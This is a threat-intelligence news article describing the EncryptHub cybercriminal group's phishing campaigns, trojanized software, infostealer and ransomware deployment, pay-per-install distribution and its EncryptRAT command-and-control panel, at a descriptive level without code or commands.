EncryptHub, a financially motivated cybercriminal group, has been observed conducting sophisticated phishing campaigns to deploy information stealers and ransomware. This group primarily targets users of popular applications by distributing trojanized versions of widely used software. Active since June 2024, EncryptHub uses a variety of phishing methods including SMS phishing (smishing), voice phishing (vishing), and spear-phishing to trick victims into installing malicious software. This group, also known as LARVA-208, is affiliated with high-profile ransomware groups such as RansomHub and Blacksuit. Their attacks have led to the compromise of over 600 high-value targets, spanning multiple industries, showcasing the group’s focus on lucrative opportunities.
The group’s primary tactic involves creating phishing websites to steal VPN credentials from unsuspecting victims. Once the attackers have obtained the credentials, they impersonate IT support or helpdesk staff and request that victims enter their details on the phishing site. These phishing websites are hosted on bulletproof providers like Yalishand, making it difficult for authorities to trace them. After gaining access to the compromised systems, EncryptHub runs PowerShell scripts that deliver various information-stealing malware, including Fickle, StealC, and Rhadamanthys.
The attackers’ ultimate goal is to deploy ransomware, encrypt data, and demand a ransom, often targeting large organizations for maximum financial gain.
In addition to phishing sites, EncryptHub uses a variety of trojanized applications to gain initial access to victim systems. These applications, which appear to be legitimate, include fake versions of popular software such as QQ Talk, Google Meet, and Microsoft Visual Studio. When these applications are installed, they initiate a multi-stage process that ultimately delivers further malicious payloads, such as Kematian Stealer. This malware is designed to steal cookies and sensitive data from victims, facilitating further exploitation.
The attackers can then move laterally within the network, escalating their access and control over critical systems and data.
To expand its reach, EncryptHub has been using third-party Pay-Per-Install (PPI) services like LabInstalls to distribute malware on a larger scale. These services allow EncryptHub to pay for bulk malware installations, thereby increasing the number of targets affected by their attacks. LabInstalls charges between $10 for 100 installs and $450 for 10,000, providing EncryptHub with a cost-effective method to spread their malicious software.
The group has also been developing a new tool, EncryptRAT, a command-and-control (C2) panel that enables them to manage active infections, issue remote commands, and exfiltrate stolen data. There is even speculation that EncryptHub might commercialize this tool, reflecting their ongoing efforts to refine their tactics and expand their cybercrime operations. Organizations are urged to stay vigilant and adopt multi-layered security strategies to defend against evolving threats like those posed by EncryptHub.
